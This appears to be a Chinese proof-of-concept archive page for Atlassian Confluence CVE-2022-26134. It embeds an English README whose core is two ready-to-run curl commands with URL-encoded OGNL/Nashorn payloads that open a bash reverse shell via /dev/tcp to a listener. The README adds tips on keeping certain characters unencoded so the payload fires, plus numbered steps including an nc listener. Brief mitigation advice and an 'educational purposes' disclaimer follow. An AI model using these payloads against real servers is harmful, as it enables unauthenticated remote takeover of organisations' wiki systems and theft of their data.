关联漏洞
标题:
Atlassian Confluence Server 注入漏洞
(CVE-2022-26134)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server 和 Data Center 存在注入漏洞。攻击者利用该漏洞执行任意代码。以下产品及版本受到影响:1.3.0版本至7.4.17之前版本、7.13.0版本至7.13.7之前版本、7.14.0版本至7.14.3之前版本、7.15.0版本至 7.15.2之前版本、7.16.0版本至7.16.4之
描述
Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26134
介绍
# Active Exploitation of Confluence CVE-2022-26134
## Overview
CVE-2022-26134 is a critical **Remote Code Execution (RCE)** vulnerability affecting **Atlassian Confluence**. This vulnerability allows unauthenticated attackers to execute arbitrary code by injecting OGNL expressions into vulnerable endpoints.
## Affected Versions
- All supported versions of **Atlassian Confluence Server** and **Data Center** before the patched release.
## Exploit Details
The following **CURL** command demonstrates the active exploitation of this vulnerability, utilizing Java’s **Nashorn** engine to execute a reverse shell:
```bash
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
```
While making these modifications, we also need to take the URL encoding into account.
The payload string in the proof-of-concept isn't completely URL encoded. Certain characters (notably ".", "-" and "/") are not encoded.
Although it's not always the case, for this exploit, this turns out to be important to the functioning of the payload. If any of these characters are encoded,
the server will parse the URL differently, and the payload may not execute. This means we can't apply URL encoding across the whole payload once we've modified it.
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/
### Breakdown of the Payload
1. **`${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}`**
- Uses **Java Nashorn** script engine to evaluate an OGNL expression.
2. **`new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()`**
- Spawns a reverse shell connecting back to **10.0.0.28:1270**.
## Exploitation Steps
1. Set up a **listener** on your attacking machine:
```bash
nc -lvnp 1270
```
2. Execute the **CURL** exploit command.
3. Upon successful exploitation, you will receive a reverse shell.
## Mitigation
- Atlassian has released **security patches** for affected versions. It is highly recommended to update to the latest version immediately.
- Restrict access to **Confluence servers** from untrusted sources.
- Monitor logs for suspicious requests containing OGNL expressions.
## References
- [Atlassian Security Advisory](https://confluence.atlassian.com/security)
- [CVE-2022-26134 Details](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
## Disclaimer
This documentation is for **educational purposes only**. Unauthorized exploitation of systems is illegal and may result in severe consequences. Always obtain proper authorization before conducting security assessments.
文件快照
[4.0K] /data/pocs/f3e557607c7d82a2ca304aab01d448308ad88b31
└── [3.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。